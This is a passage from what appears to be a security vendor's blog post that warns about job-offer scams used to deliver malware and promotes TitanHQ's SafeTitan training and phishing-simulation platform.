The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.
For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.
The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.